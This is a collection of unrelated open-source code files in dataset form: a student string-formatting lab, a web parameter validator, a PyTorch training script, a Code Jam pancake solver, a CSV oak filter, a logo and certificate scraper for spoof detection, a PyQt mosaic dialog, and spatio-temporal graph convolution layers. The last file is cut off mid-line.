listint.append(string[1])\r\n else:\r\n print('\\nComma not followed by an integer.\\n')\r\n elif comma == 0:\r\n print('\\nNo comma in string.\\n') \r\n elif comma > 1:\r\n print('\\nToo many commas in string.\\n') \r\n print('{:^42}'.format(title))\r\n print('{:<20}'.format(col1), '{:>23}'.format(col2))\r\n for i in range(0, len(liststr)):\r\n print('{:<20}'.format(liststr[i]), '|', '{:>17}'.format(listint[i]))\r\n i += 1\r\n \r\nmain()","repo_name":"adamr814/College_Course_Code","sub_path":"CSCI 161/Lab 5/Roy_Adam_Assignment_5.py","file_name":"Roy_Adam_Assignment_5.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38268845365","text":"\nimport os, json, types, re\nfrom util_web import SuccessResp, ErrorResp\n\nfileRegEx = r'[^A-Za-z0-9_\\-\\.].*'\nfileSlashRegEx = r'[^A-Za-z0-9_\\-\\.\\//].*'\n\ndef _dataIdOrUrl (dataId, url, data, required=False):\n if dataId in data:\n _validateString(dataId, data)\n _validatePathName(data[dataId], dataId)\n elif url in data:\n _validateString(url, data)\n elif required:\n raise ErrorResp(\n dataId + ' or ' + url + ' parameter missing or malformed')\n\n\ndef _validateFileName (dirty, name, allowSlash=False):\n '''\n check to be sure this is a file-safe name without any problem characters\n Valid characters:\n a-z, A-Z, 0-9, dash (-), dot (.), underscore (_)\n All other characters are replaced with underscores.\n @param dirty: the string to check\n @param name: the data property name\n @param allowSlash: allow a slash (/) in the string for paths\n @return: nothing or raise an ErrorResp\n '''\n msg = name + ' parameter may only contain the characters:' + \\\n ' a-z, A-Z, 0-9, dash (-), dot (.), underscore (_)'\n if allowSlash:\n regex = fileSlashRegEx\n msg += ', slash (/)'\n else:\n regex = fileRegEx\n\n search = re.search(regex, dirty)\n if not search == None:\n raise ErrorResp(msg)\n\n\ndef _validateInteger (name, data, required=False):\n if name in data:\n try:\n val = int(data[name])\n except ValueError:\n raise ErrorResp(name + ' parameter must be an integer')\n elif required: # name is not in data\n raise ErrorResp(name + ' parameter missing or malformed')\n\n\ndef _validatePathName (dirty, name):\n _validateFileName (dirty, name, allowSlash=True)\n\n\ndef _validateString(name, data, required=False, arrayAllowed=False):\n '''\n Validate a string or an array of strings.\n @param name: the name of the property in the data\n @param data: the object in which the property resides\n @param required: this property is required in the data, optional,\n defaults to false\n @param arrayAllowed: an array of strings are allowed for this property,\n optional, defaults to false\n @return: nothing or raise an ErrorResp\n '''\n if name in data:\n val = data[name]\n if isinstance(val, types.StringTypes):\n if len(val) < 1:\n raise ErrorResp(name +\n ' parameter must have a string length greater than one')\n _validateStringChars(val, name)\n else:\n \n # This is not a string, but maybe an array.\n if arrayAllowed:\n if not isinstance(val, list):\n raise ErrorResp(name +\n ' parameter should be a string or an array of strings')\n \n # Check each string in the array\n for value in val:\n if not isinstance(value, types.StringTypes):\n raise ErrorResp(name +\n ' parameter should be a string or an array of strings')\n _validateStringChars(value, name)\n else:\n raise ErrorResp(name + ' parameter should be a string')\n\n elif required: # name is not in data\n raise ErrorResp(name + ' parameter missing or malformed')\n\n\ndef _validateStringChars(val, name):\n '''\n Look for any non-printable characters in a string value, non-printables are\n ascii decimal codes 0-31 and 127-255.\n @param val: the string value\n @param name: the name of the parameter\n @return: nothing or raise an ErrorResp\n '''\n regex = r'[\\x00-\\x1f\\x7f-\\xff]'\n search = re.search(regex, val)\n if not search == None:\n raise ErrorResp(name +\n ' parameter should only contain printable characters')\n\n\ndef attributes(data, required=False):\n _validateString('attributes', data, required, arrayAllowed=True)\n\n\ndef authGroup(data):\n _validateString('authGroup', data)\n\n\ndef byteSize (data):\n name = 'byteSize'\n _validateInteger (name, data)\n if name not in data:\n raise ErrorResp('byteSize parameter is required')\n\n\ndef cleanFileName (dirty):\n\n # Convert a string to a clean string that may be used as a file name.\n # Valid characters:\n # a-z, A-Z, 0-9, dash (-), dot (.), underscore (_)\n # All other characters are replaced with underscores.\n if not dirty:\n return None\n \n clean = ''\n if re.search(fileRegEx, dirty) == None:\n clean = dirty\n else:\n for i in range(0, len(dirty)):\n if re.search(fileRegEx, dirty[i]) == None:\n clean += dirty[i]\n else:\n clean += '_'\n return clean\n\n\ndef colorAttribute (data, required=False):\n _dataIdOrUrl('colorAttributeDataId', 'colorAttributeUrl', data, required)\n\n\ndef email(data):\n _validateString('email', data, required=False, arrayAllowed=True)\n\n\ndef emailSingleRequired(data):\n _validateString('email', data, required=True)\n\n\ndef layout(data, required=False):\n _validateString('layout', data, required)\n\n\ndef layoutInput (data, required=False):\n _dataIdOrUrl('layoutInputDataId', 'layoutInputUrl', data, required)\n\n\ndef layoutInputName(data, required):\n _validateString('layoutInputName', data, required, True)\n\n\ndef major(data):\n _validateString('major', data, required=True)\n\n\ndef map(data, required):\n _validateString('map', data, required)\n\n # Is the name file-safe?\n val = data['map']\n slashCount = val.count('/')\n \n if slashCount > 1:\n raise ErrorResp('map IDs may not contain more than one slash')\n \n else:\n _validateFileName(val, 'map', allowSlash=True)\n\n\ndef minor(data):\n _validateString('minor', data)\n\n\ndef neighborCount (data):\n name = 'neighborCount'\n _validateInteger (name, data)\n if name in data:\n if data[name] < 1 or data[name] > 30:\n raise ErrorResp('neighborCount parameter must be within the range, 1-30')\n\n\ndef nodes(data, required=False):\n _validateString('nodes', data, required, arrayAllowed=True)\n\n\ndef token(data):\n _validateString('token', data, required=True)\n\n\ndef viewServer(data):\n if 'viewServer' not in data:\n return\n _validateString('viewServer', data)\n","repo_name":"Stuartlab-UCSC/hexmap-data","sub_path":"www/validate_web.py","file_name":"validate_web.py","file_ext":"py","file_size_in_byte":6326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71311346756","text":"import os\nimport sys\nimport time\nimport logging\n\nimport torch\nfrom torch.utils.data import DataLoader\n\nSCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))\nsys.path.append(os.path.dirname(SCRIPT_DIR))\n\nfrom src.dataset import get_dataloader_from_cfg\nfrom src.model import get_model_from_cfg\nfrom src.optim import create_optimizer_with_scheduler_from_cfg\nfrom src.loss import BCEWithLogitsLoss\nfrom src.evaluate import evaluate\nfrom src.utils.checkpoint import save_checkpoint, load_checkpoint\nfrom src.utils.checkpoint import save_checkpoint, load_checkpoint\n\ncheckpoint_path = \"checkpoint.pth\"\n\ndef train(config: dict, save_dir: str):\n\n # Set logger\n logger = logging.getLogger(\"__main__\")\n logger.info(f\"Config: {config}\")\n\n # Device\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n logger.info(f\"Device: {device}\")\n\n # Loading cfgs\n train_cfg = config[\"train\"]\n test_cfg = config[\"test\"]\n\n # Loading data\n train_set, train_loader = get_dataloader_from_cfg(train_cfg[\"data\"])\n test_set, test_loader = get_dataloader_from_cfg(test_cfg[\"data\"])\n logger.info(f\"Training data: {len(train_set)}, Testing data: {len(test_set)}\")\n\n # Init model\n model_cfg = config[\"model\"]\n model = get_model_from_cfg(model_cfg)\n model = model.to(device)\n model.train()\n \n # Define criterion\n criterion = BCEWithLogitsLoss()\n\n # Defining optimizer and scheduler\n optimizer, scheduler = create_optimizer_with_scheduler_from_cfg(model.parameters(), train_cfg)\n\n # Resume training\n resume_ckpt = train_cfg.get(\"resume_ckpt\", \"\")\n start_epoch = 0\n if torch.cuda.is_available() and os.path.exists(resume_ckpt):\n start_epoch = load_checkpoint(model, optimizer, resume_ckpt)\n scheduler.set_last_epoch(start_epoch)\n logger.info(f\"{model}\")\n \n # Define training params\n num_epochs = train_cfg['epochs']\n start_time = time.time()\n\n # MLflow trace\n for epoch in range(start_epoch, num_epochs):\n # Train\n total_loss = 0.0\n running_loss = 0.0\n for i, (inputs, labels) in enumerate(train_loader):\n inputs, labels = inputs.to(device), labels.to(device)\n labels = labels.view(-1, 1).float()\n\n # set zero gradient\n optimizer.zero_grad()\n\n # forward\n outputs = model(inputs)\n loss = criterion(outputs, labels)\n # backward\n loss.backward()\n # optimization\n optimizer.step()\n\n running_loss += loss.item()\n total_loss += loss.item()\n if i % 5 == 4: # output verbose each ten steps\n elapsed_time = time.time() - start_time\n estimated_time = (elapsed_time / (epoch * len(train_loader) + i + 1)) * (num_epochs * len(train_loader))\n time_remaining = estimated_time - elapsed_time\n logger.info(f\"[Epoch {epoch + 1}, Mini-batch {i + 1}] loss: {running_loss / 10:.6f}, elapsed time: {elapsed_time:.2f} seconds, estimated total time: {estimated_time:.2f} seconds, time remaining: {time_remaining:.2f} seconds\")\n running_loss = 0.0\n\n average_loss = total_loss / len(train_loader.dataset)\n \n # Evaluate\n metrics = evaluate(test_cfg, model, test_loader, criterion, device)\n logger.info(f\"[Epoch {epoch + 1}] train loss: {average_loss:.6f}, evaluate loss: {metrics['evaluate_loss']:.6f}, AUC: {metrics['AUC']:.3f} with optimal threashold: {metrics['optimal_threshold']:.3f}, accuracy: {metrics['accuracy']:.3f}, precision: {metrics['precision']:.3f}, recall: {metrics['recall']:.3f}, f1_score: {metrics['f1_score']:.3f}\")\n \n # Save model\n checkpoint_dir = os.path.join(save_dir, 'checkpoints')\n if not os.path.exists(checkpoint_dir):\n os.makedirs(checkpoint_dir)\n save_path = os.path.join(checkpoint_dir, f'epoch_{epoch + 1}.pth')\n save_checkpoint(epoch, model, optimizer, save_path)\n scheduler.step()\n\n # Save the last epoch\n save_path = os.path.join(checkpoint_dir, 'last.pth')\n save_checkpoint(epoch, model, optimizer, save_path)\n logger.info(\"$END_OF_LOGS$\")\n\n","repo_name":"PPPPierre/Landfill_Prediction","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23543613331","text":"import sys\r\n\r\nCANT_SOLVE = 'IMPOSSIBLE'\r\nDEBUG = False\r\nimport re\r\n\r\ndef solveCase(happyString, k):\r\n happyArray = [char == '+' for char in happyString]\r\n #Greedy:\r\n nFlips = 0\r\n for i in range(len(happyArray)):\r\n if not happyArray[i]:\r\n #Check flip is OK\r\n if not (i+k-1 < len(happyArray)):\r\n return CANT_SOLVE\r\n\r\n else:\r\n #left Flip\r\n nFlips = nFlips + 1\r\n for f in range(k):\r\n flipIndex = i+f\r\n happyArray[ flipIndex ] = not happyArray[ flipIndex ]\r\n if DEBUG:\r\n print(\r\n \"Flip num %s to %s\" % (\r\n nFlips,\"\".join(\r\n [\"+\" if x else '-' for x in happyArray]\r\n )\r\n )\r\n )\r\n #End of flipping, just verify that all are ok, as they must be\r\n for i in range(len(happyArray)):\r\n if not happyArray[i]:\r\n raise RuntimeError(\"Greedy flipping has failed to flip all or \"\r\n \"notify impossibility\")\r\n \r\n return nFlips\r\n\r\n\r\nif __name__ == '__main__':\r\n if len(sys.argv) < 3:\r\n print(\"Usage: pancake.py inputfile outputfile\", file=sys.stderr)\r\n sys.exit()\r\n\r\n with open(sys.argv[1], 'r') as fin:\r\n nCases = int(fin.readline().strip())\r\n\r\n with open(sys.argv[2], 'w') as fout:\r\n for caseNumMinusOne in range(nCases):\r\n line = fin.readline().strip()\r\n (happyString, kString) = re.split(r'\\s+', line)\r\n\r\n print(\r\n 'Case #%s: %s' % (\r\n caseNumMinusOne + 1,\r\n solveCase(happyString, int(kString)),\r\n ),\r\n file = fout,\r\n )\r\n \r\n\r\n\r\n\r\nsys.stdin\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/2496.py","file_name":"2496.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74321810113","text":"\"\"\"Debugging functions\"\"\"\n\n__appname__ = \"oaks_debugme.py\"\n\nimport csv\nimport sys\nimport doctest\n\n#Define function\ndef is_an_oak(name):\n\n \"\"\" Returns True if name is starts with 'quercus'.\n\n >>> is_an_oak('Quercus')\n True\n \n >>> is_an_oak('Fraxinus')\n False\n\n >>> is_an_oak('Quercuss')\n True\n\n >>> is_an_oak('Pinus')\n False\n \n \"\"\"\n return name.lower().startswith('quercus')\n\ndef main(argv): \n\n \"\"\"Defines the main function\"\"\"\n \n f = open('../data/TestOaksData.csv','r')\n g = open('../data/JustOaksData.csv','w')\n taxa = csv.reader(f)\n csvwrite = csv.writer(g)\n oaks = set()\n for row in taxa:\n print(row)\n print (\"The genus is: \")\n print(row[0] + '\\n') \n if is_an_oak(row[0]):\n print('FOUND AN OAK!\\n')\n csvwrite.writerow([row[0], row[1]]) \n return 0\n f.close()\n g.close()\n\nif (__name__ == \"__main__\"):\n status = main(sys.argv)\n doctest.testmod()","repo_name":"XW1722/CMEECourseWork","sub_path":"Week2/code/oaks_debugme.py","file_name":"oaks_debugme.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"15522735297","text":"#!/usr/bin/env python3\nimport ssl\nimport shutil\nimport requests\nfrom bs4 import BeautifulSoup\n\nfrom entity import Entity\nfrom common import selectors, defaults, mkdir\n\ndef get_page(e: Entity):\n try:\n page = requests.get(e.url)\n except Exception:\n url = e.url.replace('http', 'https')\n page = requests.get(url)\n return page\n\ndef get_cert(e: Entity):\n ssl_url = e.url.split(\"/\")[2]\n mkdir.make_dirs([defaults.CERTS_PATH])\n fn = f\"{defaults.CERTS_PATH}/{e.bco}.cert\"\n\n try:\n cert = ssl.get_server_certificate((ssl_url, 443), ca_certs=None)\n with open(fn, 'w') as f:\n f.write(cert)\n except Exception as err:\n with open(f\"{defaults.DATA_PATH}/{e.bco}.error.log\", 'w+') as f:\n f.write(str(err))\n return fn\n\ndef get_img_logo(src: str, fn):\n res = requests.get(src, stream=True)\n with open(fn, \"wb\") as f:\n shutil.copyfileobj(res.raw, f)\n return fn\n\ndef get_logos(e: Entity):\n page = get_page(e)\n soup = BeautifulSoup(page.content, \"html.parser\")\n logos = soup.select(selectors.img_logo)\n logos.extend(soup.select(selectors.id_logo))\n logos.extend(soup.select(selectors.cls_logo))\n\n mkdir.make_dirs([defaults.LOGOS_DATA_PATH])\n\n i = 1\n lfn = []\n for l in logos:\n if 'src' in l.attrs:\n src = l.attrs['src']\n ext = src.split('.')[-1].split('/')[-1]\n if not src.startswith('http'): src = e.url + src\n fn = f\"{defaults.LOGOS_DATA_PATH}/{e.bco}.{i}.{ext}\"\n lfn.append(get_img_logo(src, fn))\n i+=1\n return lfn\n","repo_name":"xaiki/spoof-detect","sub_path":"python/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70969080833","text":"import sys, os.path\nfrom .pyqtgraph_vini.Qt import QtCore, QtGui\nimport numpy as np\nimport math\nimport os\nimport time\nimport copy\n\nfrom .pyqtgraph_vini import *\nfrom .QxtSpanSliderH import QxtSpanSliderH\n\n# testing input\nfrom .testInputs import testFloat, testInteger\n\n\nclass MosaicDialog(QtGui.QDialog):\n \"\"\"\n Mosaic dialog window\n \"\"\"\n\n sigEdited = QtCore.Signal()\n sigFinished = QtCore.Signal()\n sigClosed = QtCore.Signal()\n\n def __init__(self):\n super(MosaicDialog, self).__init__()\n\n self.dims = [0,0,0]\n self.rows = 4\n self.cols = 4\n self.start = 0\n self.incr = 1\n self.plane = 't'\n\n # line regions\n self.lr_1 = None\n self.lr_2 = None\n\n self.layout = QtGui.QGridLayout()\n\n self.form_part = QtGui.QWidget()\n self.form = QtGui.QFormLayout()\n self.form_part.setLayout(self.form)\n self.slice_plane = QtGui.QComboBox()\n self.slice_plane.addItem(\"axial\")\n self.slice_plane.addItem(\"sagittal\")\n self.slice_plane.addItem(\"coronal\")\n self.slice_plane.currentIndexChanged.connect(self.entriesEdited)\n # self.slice_plane.currentIndexChanged.connect(self.updatePlane)\n self.form.addRow(\"Choose slice plane:\", self.slice_plane)\n\n # range slider\n self.slider_color = QtGui.QColor()\n self.slider_color.setRgb(255, 110, 0)\n self.slider_block = False\n self.range_sld = QxtSpanSliderH()\n self.range_sld.setRange(0, 255)\n self.range_sld.setSpan(0, 255)\n self.range_sld.setGradientLeftColor(self.slider_color)\n self.range_sld.setGradientRightColor(self.slider_color)\n self.range_sld.spanChanged.connect(self.setRangeFromSlider)\n self.form.addRow(\"Range:\", self.range_sld)\n\n self.start_le = QtGui.QLineEdit(\"0\")\n self.start_le.returnPressed.connect(self.entriesEdited)\n self.start_le.editingFinished.connect(self.entriesEdited)\n self.form.addRow(\"start:\", self.start_le)\n\n self.end_le = QtGui.QLineEdit(\"\")\n self.end_le.returnPressed.connect(self.entriesEdited)\n self.end_le.editingFinished.connect(self.entriesEdited)\n self.form.addRow(\"end:\", self.end_le)\n\n self.rows_le = QtGui.QLineEdit(\"4\")\n self.rows_le.returnPressed.connect(self.entriesEdited)\n self.rows_le.editingFinished.connect(self.entriesEdited)\n self.form.addRow(\"rows:\", self.rows_le)\n\n self.cols_le = QtGui.QLineEdit(\"4\")\n self.cols_le.returnPressed.connect(self.entriesEdited)\n self.cols_le.editingFinished.connect(self.entriesEdited)\n self.form.addRow(\"cols:\", self.cols_le)\n\n self.increment_label = QtGui.QLabel(\"increment:\")\n self.increment_label.setAlignment(\n QtCore.Qt.AlignVCenter | QtCore.Qt.AlignCenter)\n\n # close button\n self.close_button = QtGui.QPushButton('close', self)\n self.close_button.setFocusPolicy(QtCore.Qt.NoFocus)\n self.close_button.clicked.connect(self.closeEvent)\n self.close_button.setShortcut(QtGui.QKeySequence.Quit)\n\n # Slice Button\n self.slice_button = QtGui.QPushButton('Slice to mosaic!', self)\n self.slice_button.setFocusPolicy(QtCore.Qt.NoFocus)\n self.slice_button.clicked.connect(self.slice)\n\n self.layout.addWidget(self.form_part, 0, 0, 6, 6)\n self.layout.addWidget(self.increment_label, 6, 0, 1, 6)\n self.layout.addWidget(self.slice_button, 7, 0, 1, 3)\n self.layout.addWidget(self.close_button, 7, 3, 1, 3)\n\n self.setLayout(self.layout)\n\n def reset(self):\n \"\"\"\n Set the widgets to the correct values.\n \"\"\"\n self.slice_plane.setCurrentIndex(0)\n self.rows_le.setText(\"4\")\n self.cols_le.setText(\"4\")\n self.start_le.setText(\"0\")\n self.end_le.setText(str(int(self.dims[0]-1)))\n self.end = int(self.dims[0]-1)\n # Range slider update\n self.range_sld.setRange(0, self.end-1)\n self.range_sld.setSpan(0, self.end-1)\n self.incr = int(np.floor(self.dims[0]/16))\n\n def setDims(self, n_dims):\n \"\"\"\n Updates the possible dimensions.\n \"\"\"\n if self.dims[0] != n_dims[0] or self.dims[1] != n_dims[1] or self.dims[2] != n_dims[2]:\n self.dims = copy.copy(n_dims)\n self.reset()\n\n def closeEvent(self, ev=None):\n self.hide()\n self.sigClosed.emit()\n\n def slice(self):\n self.sigFinished.emit()\n\n def setRangeFromSlider(self):\n \"\"\"\n Sets the values from the range to the line edits and calls for update.\n \"\"\"\n self.slider_block = True\n # print(str(self.range_sld.lowerValue))\n # print(str(self.range_sld.upperValue))\n self.start = self.range_sld.lowerValue\n self.end = self.range_sld.upperValue\n self.start_le.setText(str(self.start))\n self.end_le.setText(str(self.end))\n self.entriesEdited()\n self.slider_block = False\n\n def entriesEdited(self):\n \"\"\"\n Checks if entries are integers and emits signal to process data further.\n \"\"\"\n if testInteger(self.rows_le.text()):\n self.rows = int(self.rows_le.text())\n else:\n return 0\n if testInteger(self.cols_le.text()):\n self.cols = int(self.cols_le.text())\n else:\n return 0\n if testInteger(self.start_le.text()):\n self.start = int(self.start_le.text())\n if self.start < 0:\n self.start = 0\n self.start_le.setText(str(int(self.start)))\n else:\n return 0\n if testInteger(self.end_le.text()):\n self.end = int(self.end_le.text())\n else:\n return 0\n if self.slice_plane.currentIndex() == 1:\n self.plane = 's'\n self.range_sld.setRange(0, self.dims[0]-1)\n if self.end >= self.dims[0]:\n self.end = self.dims[0]-1\n self.end_le.setText(str(int(self.end)))\n self.range_sld.setUpperPosition(self.end)\n if self.slice_plane.currentIndex() == 2:\n self.plane = 'c'\n self.range_sld.setRange(0, self.dims[1]-1)\n if self.end >= self.dims[1]:\n self.end = self.dims[1]-1\n self.end_le.setText(str(int(self.end)))\n self.range_sld.setUpperPosition(self.end)\n if self.slice_plane.currentIndex() == 0:\n self.plane = 't'\n self.range_sld.setRange(0, self.dims[2]-1)\n if self.end >= self.dims[2]:\n self.end = self.dims[2]-1\n self.end_le.setText(str(int(self.end)))\n self.range_sld.setUpperPosition(self.end)\n if not self.slider_block:\n self.range_sld.setSpan(self.start, self.end)\n self.sigEdited.emit()\n","repo_name":"lipsia-fmri/vini","sub_path":"vini/MosaicDialog.py","file_name":"MosaicDialog.py","file_ext":"py","file_size_in_byte":6898,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"11036202788","text":"import math\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport torch.nn.init as init\r\n\r\n##Before the Temporal Convolution Layer, we need to align the c_in and c_out\r\nclass Align(nn.Module):\r\n def __init__(self, c_in, c_out):\r\n super(Align, self).__init__()\r\n self.c_in = c_in\r\n self.c_out = c_out\r\n #H_in and H_out remain the same since padding =0, stide =1\r\n #W_in and W_out remain the same since padding =0, stide =1\r\n self.align_conv = nn.Conv2d(in_channels=self.c_in, out_channels=self.c_out, kernel_size=(1, 1))\r\n\r\n def forward(self, x):\r\n if self.c_in > self.c_out:\r\n x_align = self.align_conv(x)\r\n elif self.c_in < self.c_out:\r\n batch_size, c_in, timestep, n_vertex = x.shape\r\n x_align = torch.cat([x, torch.zeros([batch_size, self.c_out - self.c_in, timestep, n_vertex]).to(x)], dim=1)\r\n else:\r\n x_align = x\r\n return x_align\r\n\r\nclass CausalConv1d(nn.Conv1d):\r\n def __init__(self, in_channels, out_channels, kernel_size, stride=1, enable_padding=False, dilation=1, groups=1, bias=True):\r\n if enable_padding == True:\r\n self.__padding = (kernel_size - 1) * dilation\r\n else:\r\n self.__padding = 0\r\n super(CausalConv1d, self).__init__(in_channels, out_channels, kernel_size=kernel_size, stride=stride, padding=self.__padding, dilation=dilation, groups=groups, bias=bias)\r\n\r\n def forward(self, input):\r\n result = super(CausalConv1d, self).forward(input)\r\n if self.__padding != 0:\r\n return result[: , : , : -self.__padding]\r\n return result\r\n\r\nclass CausalConv2d(nn.Conv2d):\r\n def __init__(self, in_channels, out_channels, kernel_size, stride=1, enable_padding=False, dilation=1, groups=1, bias=True):\r\n kernel_size = nn.modules.utils._pair(kernel_size)\r\n stride = nn.modules.utils._pair(stride)\r\n dilation = nn.modules.utils._pair(dilation)\r\n if enable_padding == True:\r\n self.__padding = [int((kernel_size[i] - 1) * dilation[i]) for i in range(len(kernel_size))]\r\n else:\r\n self.__padding = 0\r\n self.left_padding = nn.modules.utils._pair(self.__padding)\r\n super(CausalConv2d, self).__init__(in_channels, out_channels, kernel_size, stride=stride, padding=0, dilation=dilation, groups=groups, bias=bias)\r\n \r\n def forward(self, input):\r\n if self.__padding != 0:\r\n input = F.pad(input, (self.left_padding[1], 0, self.left_padding[0], 0))\r\n result = super(CausalConv2d, self).forward(input)\r\n return result\r\n\r\nclass TemporalConvLayer(nn.Module):\r\n\r\n # Temporal Convolution Layer (GLU)\r\n #\r\n # |-------------------------------| * residual connection *\r\n # | |\r\n # | |--->--- casual conv ----- + -------| \r\n # -------|----| ⊙ ------>\r\n # |--->--- casual conv --- sigmoid ---| \r\n #\r\n \r\n #param x: tensor, [batch_size, c_in, timestep, n_vertex]\r\n\r\n def __init__(self, Kt, c_in, c_out, n_vertex, act_func, enable_gated_act_func):\r\n super(TemporalConvLayer, self).__init__()\r\n self.Kt = Kt\r\n self.c_in = c_in\r\n self.c_out = c_out\r\n self.n_vertex = n_vertex\r\n self.act_func = act_func\r\n self.enable_gated_act_func = enable_gated_act_func\r\n self.align = Align(self.c_in, self.c_out)\r\n if self.enable_gated_act_func == True:\r\n self.causal_conv = CausalConv2d(in_channels=self.c_in, out_channels=2 * self.c_out, kernel_size=(self.Kt, 1), enable_padding=False, dilation=1)\r\n else:\r\n self.causal_conv = CausalConv2d(in_channels=self.c_in, out_channels=self.c_out, kernel_size=(self.Kt, 1), enable_padding=False, dilation=1)\r\n self.linear = nn.Linear(self.n_vertex, self.n_vertex)\r\n self.sigmoid = nn.Sigmoid()\r\n self.tanh = nn.Tanh()\r\n self.softsign = nn.Softsign()\r\n self.relu = nn.ReLU()\r\n self.softplus = nn.Softplus()\r\n self.leakyrelu = nn.LeakyReLU()\r\n self.prelu = nn.PReLU()\r\n self.elu = nn.ELU()\r\n\r\n def forward(self, x): \r\n x_in = self.align(x)[:, :, self.Kt - 1:, :]\r\n x_causal_conv = self.causal_conv(x)\r\n\r\n if self.enable_gated_act_func == True:\r\n #in the second dimension, split as half\r\n x_p = x_causal_conv[:, : self.c_out, :, :]\r\n x_q = x_causal_conv[:, -self.c_out:, :, :]\r\n\r\n # Temporal Convolution Layer (GLU)\r\n if self.act_func == \"glu\":\r\n\r\n # (x_p + x_in) ⊙ Sigmoid(x_q)\r\n x_glu = torch.mul((x_p + x_in), self.sigmoid(x_q))\r\n x_tc_out = x_glu\r\n\r\n # Temporal Convolution Layer (GTU)\r\n elif self.act_func == \"gtu\":\r\n # Tanh(x_p + x_in) ⊙ Sigmoid(x_q)\r\n x_gtu = torch.mul(self.tanh(x_p + x_in), self.sigmoid(x_q))\r\n x_tc_out = x_gtu\r\n\r\n else:\r\n raise ValueError(f'ERROR: activation function {self.act_func} is not defined.')\r\n\r\n else:\r\n\r\n # Temporal Convolution Layer (Linear)\r\n if self.act_func == \"linear\":\r\n x_linear = self.linear(x_causal_conv + x_in)\r\n x_tc_out = x_linear\r\n \r\n # Temporal Convolution Layer (Sigmoid)\r\n elif self.act_func == \"sigmoid\":\r\n x_sigmoid = self.sigmoid(x_causal_conv + x_in)\r\n x_tc_out = x_sigmoid\r\n\r\n # Temporal Convolution Layer (Tanh)\r\n elif self.act_func == \"tanh\":\r\n x_tanh = self.tanh(x_causal_conv + x_in)\r\n x_tc_out = x_tanh\r\n\r\n # Temporal Convolution Layer (Softsign)\r\n elif self.act_func == \"softsign\":\r\n x_softsign = self.softsign(x_causal_conv + x_in)\r\n x_tc_out = x_softsign\r\n\r\n # Temporal Convolution Layer (ReLU)\r\n elif self.act_func == \"relu\":\r\n x_relu = self.relu(x_causal_conv + x_in)\r\n x_tc_out = x_relu\r\n\r\n # Temporal Convolution Layer (Softplus)\r\n elif self.act_func == \"softplus\":\r\n x_softplus = self.softplus(x_causal_conv + x_in)\r\n x_tc_out = x_softplus\r\n \r\n # Temporal Convolution Layer (LeakyReLU)\r\n elif self.act_func == \"leakyrelu\":\r\n x_leakyrelu = self.leakyrelu(x_causal_conv + x_in)\r\n x_tc_out = x_leakyrelu\r\n\r\n # Temporal Convolution Layer (PReLU)\r\n elif self.act_func == \"prelu\":\r\n x_prelu = self.prelu(x_causal_conv + x_in)\r\n x_tc_out = x_prelu\r\n\r\n # Temporal Convolution Layer (ELU)\r\n elif self.act_func == \"elu\":\r\n x_elu = self.elu(x_causal_conv + x_in)\r\n x_tc_out = x_elu\r\n\r\n else:\r\n raise ValueError(f'ERROR: activation function {self.act_func} is not defined.')\r\n \r\n return x_tc_out\r\n\r\n\r\nclass ChebConv(nn.Module):\r\n def __init__(self, c_in, c_out, Ks, chebconv_matrix, enable_bias, graph_conv_act_func):\r\n super(ChebConv, self).__init__()\r\n self.c_in = c_in\r\n self.c_out = c_out\r\n self.Ks = Ks\r\n self.chebconv_matrix = chebconv_matrix\r\n self.enable_bias = enable_bias\r\n self.graph_conv_act_func = graph_conv_act_func\r\n self.weight = nn.Parameter(torch.FloatTensor(self.Ks, self.c_in, self.c_out))\r\n if self.enable_bias == True:\r\n self.bias = nn.Parameter(torch.FloatTensor(self.c_out))\r\n else:\r\n self.register_parameter('bias', None)\r\n self.initialize_parameters()\r\n\r\n def initialize_parameters(self):\r\n # For Sigmoid, Tanh or Softsign\r\n if self.graph_conv_act_func == 'sigmoid' or self.graph_conv_act_func == 'tanh' or self.graph_conv_act_func == 'softsign':\r\n init.xavier_uniform_(self.weight)\r\n\r\n # For ReLU, Softplus, Leaky ReLU, PReLU, or ELU\r\n elif self.graph_conv_act_func == 'relu' or self.graph_conv_act_func == 'softplus' or self.graph_conv_act_func == 'leakyrelu' \\\r\n or self.graph_conv_act_func == 'prelu' or self.graph_conv_act_func == 'elu':\r\n init.kaiming_uniform_(self.weight)\r\n\r\n if self.bias is not None:\r\n _out_feats_bias = self.bias.size(0)\r\n stdv_b = 1. / math.sqrt(_out_feats_bias)\r\n init.uniform_(self.bias, -stdv_b, stdv_b)\r\n\r\n def forward(self, x):\r\n batch_size, c_in, T, n_vertex = x.shape\r\n\r\n # Using recurrence relation to reduce time complexity from O(n^2) to O(K|E|),\r\n # where K = Ks - 1\r\n x = x.reshape(n_vertex, -1)\r\n x_0 = x\r\n x_1 = torch.mm(self.chebconv_matrix, x)\r\n if self.Ks - 1 < 0:\r\n raise ValueError(f'ERROR: the graph convolution kernel size Ks must be greater than 0, but received {self.Ks}.') \r\n elif self.Ks - 1 == 0:\r\n x_list = [x_0]\r\n elif self.Ks - 1 == 1:\r\n x_list = [x_0, x_1]\r\n elif self.Ks - 1 >= 2:\r\n x_list = [x_0, x_1]\r\n for k in range(2, self.Ks):\r\n x_list.append(torch.mm(2 * self.chebconv_matrix, x_list[k - 1]) - x_list[k - 2])\r\n x_tensor = torch.stack(x_list, dim=0)\r\n\r\n x_mul = torch.mm(x_tensor.reshape(-1, 